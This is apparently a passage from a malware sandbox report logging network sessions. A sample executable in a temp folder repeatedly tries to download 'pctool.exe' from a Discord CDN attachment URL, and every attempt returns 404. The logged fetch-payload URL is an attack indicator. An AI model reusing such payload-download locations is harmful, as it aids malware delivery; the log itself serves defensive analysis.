                                      Set-Cookie: __cf_bm=knesx7DSN5Jf9.f8nrcNe45dUvIee84DYFvSB0waUbA-1724230682-1.0.1.1-afhx6ocTWqnt.ionZY.wK7ha6AEq1GVZNUs8Sn_DQbRN2jlNCxgMhpoRRTmGIT7JtqYHjBy4YGz4p2bRFDXEMQ; path=/; expires=Wed, 21-Aug-24 09:28:02 GMT; domain=.discordapp.com; HttpOnly; Secure
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FwMRErWBlHWTAXo6O8ONlrp6c1aYnMBbX6zSKFG4zWd2kpeqLzP4nb8SQVR%2FHOMITvFWtTKZsonxHnZjPAGrxU9JuG2xHVsMlZXsjEmdPokHfY10i3QbyuIpAOnsokjLBa7cZA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Set-Cookie: _cfuvid=BTdj7aneGMzxlvEWKOh886C10hnjhxHmPMOc6dOKEKI-1724230682127-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                                      Server: cloudflare
                                      CF-RAY: 8b696b4338974204-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-08-21 08:58:02 UTC36INData Raw: 54 68 69 73 20 63 6f 6e 74 65 6e 74 20 69 73 20 6e 6f 20 6c 6f 6e 67 65 72 20 61 76 61 69 6c 61 62 6c 65 2e
                                      Data Ascii: This content is no longer available.


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      13192.168.2.459991162.159.130.2334437972C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe
                                      TimestampBytes transferredDirectionData
                                      2024-08-21 08:58:07 UTC104OUTGET /attachments/873244194234318850/897174379568451604/pctool.exe HTTP/1.1
                                      Host: cdn.discordapp.com
                                      2024-08-21 08:58:07 UTC1055INHTTP/1.1 404 Not Found
                                      Date: Wed, 21 Aug 2024 08:58:07 GMT
                                      Content-Type: text/plain;charset=UTF-8
                                      Content-Length: 36
                                      Connection: close
                                      X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                      Set-Cookie: __cf_bm=QBfgPowNSyHKBwR4f7j3OJQn_APs9Y.XzKYVaxMZMMc-1724230687-1.0.1.1-piFiTuSgFWnFvr615lIClE_pu43vyZ4PZ5ZZpULNdkvbL.N1DFWU6OBp4Z9bMUvY4hOZcLSSQPj0mlVW8P2s3A; path=/; expires=Wed, 21-Aug-24 09:28:07 GMT; domain=.discordapp.com; HttpOnly; Secure
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HqHycy%2BgnWyAz6cOaaQCtMgB4h%2BuT3rt4wvexZiL%2Brg9Lv3fWb0Ylp0wyU3M7CBcx5TzHRlseblMYHP9FYF5p2TW%2F%2BgTAHz4pC5aYVSJHGAl0aKteFSp%2B69L%2FTUV6pQUZYMN4Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Set-Cookie: _cfuvid=X33qFnUkNQW1Ewxnpo4ZVIZo8wKEB7yMr056MhSjbCE-1724230687749-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                                      Server: cloudflare
                                      CF-RAY: 8b696b665922428f-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-08-21 08:58:07 UTC36INData Raw: 54 68 69 73 20 63 6f 6e 74 65 6e 74 20 69 73 20 6e 6f 20 6c 6f 6e 67 65 72 20 61 76 61 69 6c 61 62 6c 65 2e
                                      Data Ascii: This content is no longer available.


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      14192.168.2.459994162.159.130.2334437972C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe
                                      TimestampBytes transferredDirectionData
                                      2024-08-21 08:58:13 UTC104OUTGET /attachments/873244194234318850/897174379568451604/pctool.exe HTTP/1.1
                                      Host: cdn.discordapp.com
                                      2024-08-21 08:58:13 UTC1051INHTTP/1.1 404 Not Found
                                      Date: Wed, 21 Aug 2024 08:58:13 GMT
                                      Content-Type: text/plain;charset=UTF-8
                                      Content-Length: 36
                                      Connection: close
                                      X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                      Set-Cookie: __cf_bm=bskmNyFA.em5pucrqCIeIAZxchsxcrAWFg7iixkJhvA-1724230693-1.0.1.1-47TjB8Yk9s.11hO6ZntteaTo8FbnA9qjd91b2I_Dr5q0RZaWWW5K3IUD5FyoZXX4QIN3AEIaSqWIk57yWm0NwA; path=/; expires=Wed, 21-Aug-24 09:28:13 GMT; domain=.discordapp.com; HttpOnly; Secure
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yjMAwkdG0jbfdYcVfaeNwH9J3rviF3UGMvuZpmLWrAUdY4DIRoaLwQgOp%2Bmon%2BIrX7BTdB%2FsXko3ijz67fK7EudLWpuGfiV%2FLo5lWOaR5ia%2BXrYpUCRtJl3lDFxPbPPjC9zV7Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Set-Cookie: _cfuvid=L47pnd5qDKv8ufhpS4KEHViVs6Z4b0fUpsJ4_MrWGco-1724230693394-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                                      Server: cloudflare
                                      CF-RAY: 8b696b899b0f7ca6-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-08-21 08:58:13 UTC36INData Raw: 54 68 69 73 20 63 6f 6e 74 65 6e 74 20 69 73 20 6e 6f 20 6c 6f 6e 67 65 72 20 61 76 61 69 6c 61 62 6c 65 2e
                                      Data Ascii: This content is no longer available.


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      15192.168.2.459998162.159.130.2334437972C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe
                                      TimestampBytes transferredDirectionData
                                      2024-08-21 08:58:18 UTC128OUTGET /attachments/873244194234318850/897174379568451604/pctool.exe HTTP/1.1
                                      Host: cdn.discordapp.com
                                      Connection: Keep-Alive
                                      2024-08-21 08:58:19 UTC1049INHTTP/1.1 404 Not Found
                                      Date: Wed, 21 Aug 2024 08:58:19 GMT
                                      Content-Type: text/plain;charset=UTF-8
                                      Content-Length: 36
                                      Connection: close
                                      X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                      Set-Cookie: __cf_bm=xX3H1OGqwmcWYigOX2Y0PXpWbveQUJPOzdgLKH1otTc-1724230699-1.0.1.1-XgtMHmm5jtkcBxJXYcob_OBN.7dzkLGmK6UG1ZnRM9pIuwE7ylMt1bozok8pWoThanDZGOxH8XwwKUsuzbr48A; path=/; expires=Wed, 21-Aug-24 09:28:19 GMT; domain=.discordapp.com; HttpOnly; Secure
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vvlzd%2FnGLUcWrWE%2FsSLglO3kPKD4ADwOlxWdyNkM46L5l5uqpzu1JFX%2BgifvU847wWuWCGkBEq5leczmnL5b%2BPdwBOzOOCoxTlGdsDXqUs7WShRf65xy5xnPUVMTYa3OIS9WPg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Set-Cookie: _cfuvid=MrWa4TPd6T5gDzXo7vdMSZrVbSssLLC_hrH8VND8Yec-1724230699076-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                                      Server: cloudflare
                                      CF-RAY: 8b696bad28fb8c63-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-08-21 08:58:19 UTC36INData Raw: 54 68 69 73 20 63 6f 6e 74 65 6e 74 20 69 73 20 6e 6f 20 6c 6f 6e 67 65 72 20 61 76 61 69 6c 61 62 6c 65 2e
                                      Data Ascii: This content is no longer available.


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      16192.168.2.460000162.159.130.2334437972C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe
                                      TimestampBytes transferredDirectionData
                                      2024-08-21 08:58:24 UTC104OUTGET /attachments/873244194234318850/897174379568451604/pctool.exe HTTP/1.1
                                      Host: cdn.discordapp.com
                                      2024-08-21 08:58:24 UTC1049INHTTP/1.1 404 Not Found
                                      Date: Wed, 21 Aug 2024 08:58:24 GMT
                                      Content-Type: text/plain;charset=UTF-8
                                      Content-Length: 36
                                      Connection: close
                                      X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                      Set-Cookie: __cf_bm=QCPexjQNCs2wcHfkMc3UB.KIL7v29VmCdADSrpsw1c4-1724230704-1.0.1.1-u2LWwTgBDJGOd27KhzdqLBonf2yhVTEUiQXtrOCU3IcGpiahiwFE8HhBaGhXGr6E5Qf9r4Gn1Acm0gh0Dnk7mA; path=/; expires=Wed, 21-Aug-24 09:28:24 GMT; domain=.discordapp.com; HttpOnly; Secure
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IQNvSm18ZHkfgQFbwFxRSIONDoOx5MvXtAz1G0j1qz3qpOgum9JorpGJSkCp8QMPovbaueFNTQ2p4i9k%2FocaVfhR73QBpNDNjyJc4JM038vpmjbfTfjK%2BLlweau%2FSn8RV%2FRCvg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Set-Cookie: _cfuvid=pNhmg.qUGiJXIK7Ia9wLlTbaFN.0BHeOkU_CnIP8v6o-1724230704735-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                                      Server: cloudflare
                                      CF-RAY: 8b696bd08a5e72b3-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-08-21 08:58:24 UTC36INData Raw: 54 68 69 73 20 63 6f 6e 74 65 6e 74 20 69 73 20 6e 6f 20 6c 6f 6e 67 65 72 20 61 76 61 69 6c 61 62 6c 65 2e
                                      Data Ascii: This content is no longer available.


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      17192.168.2.460004162.159.130.2334437972C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe
                                      TimestampBytes transferredDirectionData
                                      2024-08-21 08:58:30 UTC104OUTGET /attachments/873244194234318850/897174379568451604/pctool.exe HTTP/1.1
                                      Host: cdn.discordapp.com
                                      2024-08-21 08:58:30 UTC1045INHTTP/1.1 404 Not Found
                                      Date: Wed, 21 Aug 2024 08:58:30 GMT
                                      Content-Type: text/plain;charset=UTF-8
                                      Content-Length: 36
                                      Connection: close
                                      X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                      Set-Cookie: __cf_bm=krurwKpbTymLVgA2aApYf0ltPpSMv8HcfCC86x2Xq7s-1724230710-1.0.1.1-MNrwiCoqVqUtpkKjh4noYP0rXrluX.KsR4hgHgRFjksQCVgwhK7qiAPz2EPBejbfS_ENn.0I5daTBoW0ZoqGSg; path=/; expires=Wed, 21-Aug-24 09:28:30 GMT; domain=.discordapp.com; HttpOnly; Secure
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=c32HFYxZxHf0DFmno9id5UAIZLgZ7NmIGHdyPkv7uhTdPFo%2FgCjYf0ZbOfAJADKCoFlZeTed9WsmR3vjZ%2FSuAXIB6gg3EMdn9qj6WbtyiSeQb0jkNmqoJsCGHePr59ldtLnyKg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Set-Cookie: _cfuvid=OCZA2quprmYGr.uAq_C0UfTwTpojAbtUaQOiPENfxYE-1724230710547-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                                      Server: cloudflare
                                      CF-RAY: 8b696bf4df28c330-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-08-21 08:58:30 UTC36INData Raw: 54 68 69 73 20 63 6f 6e 74 65 6e 74 20 69 73 20 6e 6f 20 6c 6f 6e 67 65 72 20 61 76 61 69 6c 61 62 6c 65 2e
                                      Data Ascii: This content is no longer available.


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      18192.168.2.460008162.159.130.2334437972C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe
                                      TimestampBytes transferredDirectionData
                                      2024-08-21 08:58:36 UTC128OUTGET /attachments/873244194234318850/897174379568451604/pctool.exe HTTP/1.1
                                      Host: cdn.discordapp.com
                                      Connection: Keep-Alive
                                      2024-08-21 08:58:37 UTC1051INHTTP/1.1 404 Not Found
                                      Date: Wed, 21 Aug 2024 08:58:37 GMT
                                      Content-Type: text/plain;charset=UTF-8
                                      Content-Length: 36
                                      Connection: close
                                      X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                      Set-Cookie: __cf_bm=8Cd9jYQ1izsurwmEqPFW3aHF00qy.Vl8W4xd3znwmzg-1724230717-1.0.1.1-Cg_LqgaHwqiHRxVbnFucaKxTTAk.5DElwYM75pzc4aUFc0zFUUj5vN7e7seSzFjszRhkJPNRYrA3BGzjY_73Lg; path=/; expires=Wed, 21-Aug-24 09:28:37 GMT; domain=.discordapp.com; HttpOnly; Secure
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AN40IHTdZpy5FvY1ZBEtX1LHGiwQx5m64vk4%2Ba7KD%2BUuQaKm%2FkE2CBdAcWZH%2B42UyAd3wxXsZXYLI0KOlOaBxu6uubcPrHEwoG4kvoAKNBum%2BbnkJrFQcu5XC0zU8eTOluvPsg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Set-Cookie: _cfuvid=Vnv13vlL.9RSrGj1vXXKJoadQxpJWoA6EJKZJyNo2xY-1724230717062-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                                      Server: cloudflare
                                      CF-RAY: 8b696c1d98e00f59-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-08-21 08:58:37 UTC36INData Raw: 54 68 69 73 20 63 6f 6e 74 65 6e 74 20 69 73 20 6e 6f 20 6c 6f 6e 67 65 72 20 61 76 61 69 6c 61 62 6c 65 2e
                                      Data Ascii: This content is no longer available.


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      19192.168.2.460012162.159.130.2334437972C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe
                                      TimestampBytes transferredDirectionData
                                      2024-08-21 08:58:42 UTC128OUTGET /attachments/873244194234318850/897174379568451604/pctool.exe HTTP/1.1
                                      Host: cdn.discordapp.com
                                      Connection: Keep-Alive
                                      2024-08-21 08:58:42 UTC1049INHTTP/1.1 404 Not Found
                                      Date: Wed, 21 Aug 2024 08:58:42 GMT
                                      Content-Type: text/plain;charset=UTF-8
                                      Content-Length: 36
                                      Connection: close
                                      X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                      Set-Cookie: __cf_bm=ZsescNtNQBJnq2y9c_4Fxz0TN2thXuVgGbIveMtnkM8-1724230722-1.0.1.1-ArLH5zt6K0KiWkFgbOYyjfZywBZeYzVhggeOJCNwNl.SR63AR5KdQnortVoGzx6A8O7t9xUtb7o_PPS5jEzgzg; path=/; expires=Wed, 21-Aug-24 09:28:42 GMT; domain=.discordapp.com; HttpOnly; Secure
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8fOtJHQr%2BDq01%2FmWcHGEbFDJeQT72oXle5VcOwyecLh7yRLbX7SAdFK8628PKRUrYIyHo13ukFd9kgZgp4Bi6YQaAwu6NiAc9e%2BFEqMI0ykSGJpB0QMudHpgaGAbkIjx%2BKjkwQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Set-Cookie: _cfuvid=yJ63nIIWAxjeSHzhuFsssk4DZoTpKx1ERgmCXNRsJ1Q-1724230722681-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                                      Server: cloudflare
                                      CF-RAY: 8b696c40bf06183d-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-08-21 08:58:42 UTC36INData Raw: 54 68 69 73 20 63 6f 6e 74 65 6e 74 20 69 73 20 6e 6f 20 6c 6f 6e 67 65 72 20 61 76 61 69 6c 61 62 6c 65 2e
                                      Data Ascii: This content is no longer available.


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      20192.168.2.460017162.159.130.2334437972C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe
                                      TimestampBytes transferredDirectionData
                                      2024-08-21 08:58:48 UTC128OUTGET /attachments/873244194234318850/897174379568451604/pctool.exe HTTP/1.1
                                      Host: cdn.discordapp.com
                                      Connection: Keep-Alive
                                      2024-08-21 08:58:48 UTC1051INHTTP/1.1 404 Not Found
                                      Date: Wed, 21 Aug 2024 08:58:48 GMT
                                      Content-Type: text/plain;charset=UTF-8
                                      Content-Length: 36
                                      Connection: close
                                      X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                      Set-Cookie: __cf_bm=4KNDY5YA.7ZVHZEg0lB64S65agZ.ULCcntjwbaxnH0Q-1724230728-1.0.1.1-w1Q4EcpdnxTHG84EfHv.gpl7BgPuOICKNlUFSPySoQOyPw4zLFl9IvIrGTcwa3mJcFIR40nBOWD5qPX6WMIpgQ; path=/; expires=Wed, 21-Aug-24 09:28:48 GMT; domain=.discordapp.com; HttpOnly; Secure
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AlbKeO9YG1SHnNTf7uiMHu%2BmstTyqQHCewYnX%2BhAivdRBgUnR9N1PjT4YfPzDbK%2BTkmmkdEfYVysU%2F38hXeVHmISVAHrrMpkJIXNhboAgEqWWnoZU8rYG%2FTJAK2wRrQVEwMctg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Set-Cookie: _cfuvid=o1iLNz6bj2Uohj1MQihczC58zgng.Mp7vvGnaWyOeUU-1724230728299-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                                      Server: cloudflare
                                      CF-RAY: 8b696c63ccd7c34b-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-08-21 08:58:48 UTC36INData Raw: 54 68 69 73 20 63 6f 6e 74 65 6e 74 20 69 73 20 6e 6f 20 6c 6f 6e 67 65 72 20 61 76 61 69 6c 61 62 6c 65 2e
                                      Data Ascii: This content is no longer available.


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      21192.168.2.460021162.159.130.2334437972C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe
                                      TimestampBytes transferredDirectionData
                                      2024-08-21 08:58:53 UTC128OUTGET /attachments/873244194234318850/897174379568451604/pctool.exe HTTP/1.1
                                      Host: cdn.discordapp.com
                                      Connection: Keep-Alive
                                      2024-08-21 08:58:54 UTC1051INHTTP/1.1 404 Not Found
                                      Date: Wed, 21 Aug 2024 08:58:54 GMT
                                      Content-Type: text/plain;charset=UTF-8
                                      Content-Length: 36
                                      Connection: close
                                      X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                      Set-Cookie: __cf_bm=ey1ufPKZPn3objdNt5Cb1EVnz1pHpARgxVwYD11NvaM-1724230734-1.0.1.1-eWAQyhWuRFeo6D9wxxFXWvH5OlYjYkU3lf9FKbCN4GrjLoRZ6mqLFPV3Fo9JQYN.1D36KMug3vFXXI8Px1d9iw; path=/; expires=Wed, 21-Aug-24 09:28:54 GMT; domain=.discordapp.com; HttpOnly; Secure
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=N%2BeB5N3U1PMFtU6NGsqbmeLZGwRaEF5viUTU8yDk7gz4TTMVsh%2Fpvts2ZtjPhDh5zf3RCpIhRyg%2FJg%2F1JeLnajeiM674agm0QjdDRQ%2Bv0VNgjCTwm6wiFGVYr4PGqnzeG9XXzQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Set-Cookie: _cfuvid=qnge2mMS7zgI4BEBwYdNSuL2PI4AyqmQ0IoU6WFYMVo-1724230734033-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                                      Server: cloudflare
                                      CF-RAY: 8b696c87adc20f42-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-08-21 08:58:54 UTC36INData Raw: 54 68 69 73 20 63 6f 6e 74 65 6e 74 20 69 73 20 6e 6f 20 6c 6f 6e 67 65 72 20 61 76 61 69 6c 61 62 6c 65 2e
                                      Data Ascii: This content is no longer available.


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      22192.168.2.460026162.159.130.2334437972C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe
                                      TimestampBytes transferredDirectionData
                                      2024-08-21 08:58:59 UTC128OUTGET /attachments/873244194234318850/897174379568451604/pctool.exe HTTP/1.1
                                      Host: cdn.discordapp.com
                                      Connection: Keep-Alive
                                      2024-08-21 08:58:59 UTC1043INHTTP/1.1 404 Not Found
                                      Date: Wed, 21 Aug 2024 08:58:59 GMT
                                      Content-Type: text/plain;charset=UTF-8
                                      Content-Length: 36
                                      Connection: close
                                      X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                      Set-Cookie: __cf_bm=inQIpPXoGjHTdRR16lfmIf8AlIOVJ4beJ4kAfo8Fs3Q-1724230739-1.0.1.1-X4Zdyrv6fnzmLBRFO.QE1HHVib1.2b2n7_WEseV2xmhdI.iKWNrneSt90JdW_43JLyBEGLHl7r5eTvO7qKxZYg; path=/; expires=Wed, 21-Aug-24 09:28:59 GMT; domain=.discordapp.com; HttpOnly; Secure
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=n3SIXvAicy4JP2wQA9TBs9SnSUHmtc%2B3dRtrPRKoZvePGomVq9xJ56A8e0qTmyuZvgXwS7pSENMzgvuyqrJ2lViqakWh7IcIe5XqC2QJ0svm9iO7tepFH6VH7adrOoUeAYgxFA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Set-Cookie: _cfuvid=0Pq.Whoi9etDomuC2APzSn3GmrJQ8OiU8oe45jDs2wA-1724230739688-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                                      Server: cloudflare
                                      CF-RAY: 8b696caaffba7cab-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-08-21 08:58:59 UTC36INData Raw: 54 68 69 73 20 63 6f 6e 74 65 6e 74 20 69 73 20 6e 6f 20 6c 6f 6e 67 65 72 20 61 76 61 69 6c 61 62 6c 65 2e
                                      Data Ascii: This content is no longer available.


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      23192.168.2.460029162.159.130.2334437972C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe
                                      TimestampBytes transferredDirectionData
                                      2024-08-21 08:59:05 UTC128OUTGET /attachments/873244194234318850/897174379568451604/pctool.exe HTTP/1.1
                                      Host: cdn.discordapp.com
                                      Connection: Keep-Alive
                                      2024-08-21 08:59:05 UTC1047INHTTP/1.1 404 Not Found
                                      Date: Wed, 21 Aug 2024 08:59:05 GMT
                                      Content-Type: text/plain;charset=UTF-8
                                      Content-Length: 36
                                      Connection: close
                                      X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                      Set-Cookie: __cf_bm=c6PYn6T0c0Iin.fXT3mH2FYc_JGbSq_aS.CxzV6SgT4-1724230745-1.0.1.1-jznGwhXsPNyewk2AG.ef7uVfgac1zWNCW4qRFzfy0lYbhHJokWJWwtM.hq7D0nkSNzZJxAwo6QQI.qyWMqyn0g; path=/; expires=Wed, 21-Aug-24 09:29:05 GMT; domain=.discordapp.com; HttpOnly; Secure
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WVuJaTRU1GT172zocGCC%2BLkCimohU2CDTp6HBIUNRmeZizF9jfUKp%2FUjmb2IFdFmQKIR6fwBVqZK0BlBejVtwEWsj3Y71ns38bekz7%2FIM55YNaXQf1fNPvri4rYqe0MBottEAQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Set-Cookie: _cfuvid=Dq6QkRfgMEtW1GMBBzV5FfC4CdIRSN5bcwmXUOm5HYE-1724230745345-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                                      Server: cloudflare
                                      CF-RAY: 8b696cce598f0fa8-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-08-21 08:59:05 UTC36INData Raw: 54 68 69 73 20 63 6f 6e 74 65 6e 74 20 69 73 20 6e 6f 20 6c 6f 6e 67 65 72 20 61 76 61 69 6c 61 62 6c 65 2e
                                      Data Ascii: This content is no longer available.


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      24192.168.2.460032162.159.130.2334437972C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe
                                      TimestampBytes transferredDirectionData
                                      2024-08-21 08:59:11 UTC128OUTGET /attachments/873244194234318850/897174379568451604/pctool.exe HTTP/1.1
                                      Host: cdn.discordapp.com
                                      Connection: Keep-Alive
                                      2024-08-21 08:59:11 UTC1049INHTTP/1.1 404 Not Found
                                      Date: Wed, 21 Aug 2024 08:59:11 GMT
                                      Content-Type: text/plain;charset=UTF-8
                                      Content-Length: 36
                                      Connection: close
                                      X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                      Set-Cookie: __cf_bm=VQTvQJ3y.uOD5g5c5xaWQNBhmM188o6rIDLGA17ECvE-1724230751-1.0.1.1-l4ROs4WATUeNi3_gvAbRIOgRx6QYhRIGzBZd3HN6JxvjiMze8qjNl362KSX1su1MIr_QwzpgaqyCGjG0ZnCutg; path=/; expires=Wed, 21-Aug-24 09:29:11 GMT; domain=.discordapp.com; HttpOnly; Secure
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KSMCMHkPUKKo69PhlkvUbfaq2w4M%2Fc2xgPXaCHYscTvO5rECAksPm6wn8GFnxyMseH%2BXJXDZTDaVYxfeDRtQKG0FVgbQu%2B2woN9YiUbVchUQlaHjVD%2BkyN5ghpwoA2DYEswpEA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Set-Cookie: _cfuvid=qlm_WPNa1tr.980IQ_.FMEitkNc841bngWtopOaTO.U-1724230751170-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                                      Server: cloudflare
                                      CF-RAY: 8b696cf2b8da4231-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-08-21 08:59:11 UTC36INData Raw: 54 68 69 73 20 63 6f 6e 74 65 6e 74 20 69 73 20 6e 6f 20 6c 6f 6e 67 65 72 20 61 76 61 69 6c 61 62 6c 65 2e
                                      Data Ascii: This content is no longer available.


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      25192.168.2.460037162.159.130.2334437972C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe
                                      TimestampBytes transferredDirectionData
                                      2024-08-21 08:59:16 UTC128OUTGET /attachments/873244194234318850/897174379568451604/pctool.exe HTTP/1.1
                                      Host: cdn.discordapp.com
                                      Connection: Keep-Alive
                                      2024-08-21 08:59:16 UTC1045INHTTP/1.1 404 Not Found
                                      Date: Wed, 21 Aug 2024 08:59:16 GMT
                                      Content-Type: text/plain;charset=UTF-8
                                      Content-Length: 36
                                      Connection: close
                                      X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                      Set-Cookie: __cf_bm=Pyqw3b0Di8OWxj7id.OtiugXOixtBidedcXK4GKwRB0-1724230756-1.0.1.1-rz7kJXfS127Fd.FbNPKGQWFWcMQL0AnlHjf5PdQYRaCk49b0MHiDwAADHu5MDs9Z6VCL2pJ_FgrzLpUOLbir3A; path=/; expires=Wed, 21-Aug-24 09:29:16 GMT; domain=.discordapp.com; HttpOnly; Secure
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NPLlUIMKxdOg3bSkR9WN3hmG06gSa7BVJ3vm0rI3ue57IfTF7GcY8dWK7sSoaUA6g3MnFJ9c1xuG2lzklCZe4lgRWXTmWjREaCOTIxGTM9%2BW8Nw8hTcY%2FiI5Ihapu13b5V3pVA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
